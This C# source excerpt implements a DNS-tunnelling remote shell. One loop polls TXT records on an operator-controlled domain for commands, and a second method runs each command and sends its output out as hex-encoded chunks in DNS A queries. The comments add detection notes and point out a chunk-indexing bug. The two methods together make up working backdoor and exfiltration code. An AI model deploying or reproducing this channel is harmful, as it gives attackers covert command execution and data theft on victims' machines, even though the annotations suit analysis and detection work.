        /// <summary>
        /// Polling loop that fetches operator commands over DNS TXT records and hands
        /// each one to <see cref="DnsExec"/>. Each iteration issues one TXT query for a
        /// freshly randomised subdomain of <paramref name="Domain"/> and treats the joined
        /// record text as the command. The loop has no delay, so queries are issued
        /// back-to-back until a record starting with "exit" is received.
        /// </summary>
        /// <param name="Domain">Base domain under which every query name is built.</param>
        /// <param name="IPAddr">Optional resolver address; when non-empty it is set as
        /// <c>DnsServerIp</c> on the client, otherwise the client's own default applies.</param>
        /// <remarks>
        /// Analysis/detection note: the observable is a stream of TXT queries for
        /// never-repeating labels of the form
        /// <c>&lt;4 digits&gt;&lt;8 random chars&gt;.&lt;Domain&gt;</c>, with no
        /// inter-query delay, followed by A queries carrying hex-encoded output (see
        /// <see cref="DnsExec"/>). Return values of <c>RandomNumber</c>,
        /// <c>RandomString</c> and <c>DnsClass</c> are defined elsewhere in the file.
        /// </remarks>
        static void DnsShell(string Domain, string IPAddr)
        {
            DnsClass dnsClass = new DnsClass();

            // Override the resolver only when a server address was supplied.
            if (IPAddr.Length > 0)
            {
                dnsClass.DnsServerIp = IPAddr;
            }
            while (true)
            {
                // Unique name per poll: 4-digit number (1000-9999) + 8-char random
                // label + "." + Domain. Uniqueness presumably defeats resolver caching.
                string        rnd        = RandomNumber(1000, 9999).ToString() + RandomString(8, false) + "." + Domain;
                List <string> txtRecords = dnsClass.QueryTXT(rnd);
                // A null result (no answer / lookup failure) just re-polls immediately.
                if (txtRecords == null)
                {
                    continue;
                }
                // Multiple TXT strings are concatenated with a single space.
                string responseCmd = String.Join(" ", txtRecords.ToArray());
                Console.WriteLine(responseCmd);
                // "nocmd" (any case) or an empty answer means nothing to do yet.
                if (responseCmd.ToLower().StartsWith("nocmd") || responseCmd.Length == 0)
                {
                    continue;
                }
                // "exit" (any case) is the only way out of the loop.
                if (responseCmd.ToLower().StartsWith("exit"))
                {
                    break;
                }
                DnsExec(dnsClass, responseCmd, Domain);
            }
        }
        /// <summary>
        /// Runs <paramref name="cmd"/> via <c>RunCmd</c> and sends its textual result
        /// back as a sequence of DNS A queries: one "CMDC" header query announcing the
        /// chunk count, one "CMD&lt;n&gt;" query per 50-hex-character chunk of the
        /// UTF-8/hex-encoded output, and a final "END" query. Every query name carries
        /// a fresh 8-character random label as its first component.
        /// </summary>
        /// <param name="dnsClass">DNS client used to issue the A queries.</param>
        /// <param name="cmd">Command string received from the TXT channel.</param>
        /// <param name="domain">Base domain appended to every query name.</param>
        /// <remarks>
        /// Analysis/detection note: the wire pattern is
        /// <c>&lt;8 rand&gt;.CMDC&lt;count&gt;.&lt;domain&gt;</c>,
        /// then <c>&lt;8 rand&gt;.CMD&lt;i&gt;.&lt;up to 50 hex chars&gt;.&lt;domain&gt;</c>
        /// repeated, then <c>&lt;8 rand&gt;.END.&lt;domain&gt;</c>. The hex label is
        /// uppercase (<see cref="BitConverter.ToString(byte[])"/> with dashes removed).
        /// <c>RunCmd</c> and <c>RandomString</c> are defined elsewhere in the file; what
        /// <c>RunCmd</c> executes with is not visible here.
        /// </remarks>
        static void DnsExec(DnsClass dnsClass, string cmd, string domain)
        {
            string result = RunCmd(cmd);

            // Output is UTF-8 encoded, then hex-encoded (uppercase, no separators),
            // so every byte becomes two label characters.
            byte[] sendbytes = System.Text.Encoding.UTF8.GetBytes(result);
            string bitString = BitConverter.ToString(sendbytes).Replace("-", "");
            int    bitLen    = bitString.Length;
            // 50 hex chars per chunk — presumably chosen to stay within the 63-octet
            // DNS label limit; confirm against the receiving side.
            int    split     = 50;
            // Integer division already floors; the Math.Floor is a no-op here.
            int    repeat    = (int)Math.Floor((double)(bitLen / split));
            int    remainder = bitLen % split;
            int    repeatR   = 0;

            // NOTE(review): the announced count is repeat + 1 only when there is a
            // partial trailing chunk; when the output is an exact multiple of 50 hex
            // chars (including empty output) repeatR stays 0 regardless of `repeat`.
            if (remainder > 0)
            {
                repeatR = repeat + 1;
            }
            // Header query: announces the chunk count to the receiver.
            string rnd = RandomString(8, false) + ".CMDC" + repeatR.ToString() + "." + domain;

            dnsClass.QueryA(rnd);
            int i = 0;

            // One A query per full 50-char chunk, indexed 0..repeat-1.
            for ( ; i < repeat; i++)
            {
                string subStr = bitString.Substring(i * split, split);
                rnd = RandomString(8, false) + ".CMD" + i.ToString() + "." + subStr + "." + domain;
                dnsClass.QueryA(rnd);
            }
            if (remainder > 0)
            {
                // Trailing partial chunk. The loop above exits with i == repeat, so the
                // increment labels this chunk CMD<repeat+1>; index <repeat> is never sent.
                string subStr2 = bitString.Substring(bitLen - remainder);
                i  += 1;
                rnd = RandomString(8, false) + ".CMD" + i.ToString() + "." + subStr2 + "." + domain;
                dnsClass.QueryA(rnd);
            }
            // Terminator query: marks the end of this command's output.
            rnd = RandomString(8, false) + ".END." + domain;
            dnsClass.QueryA(rnd);
        }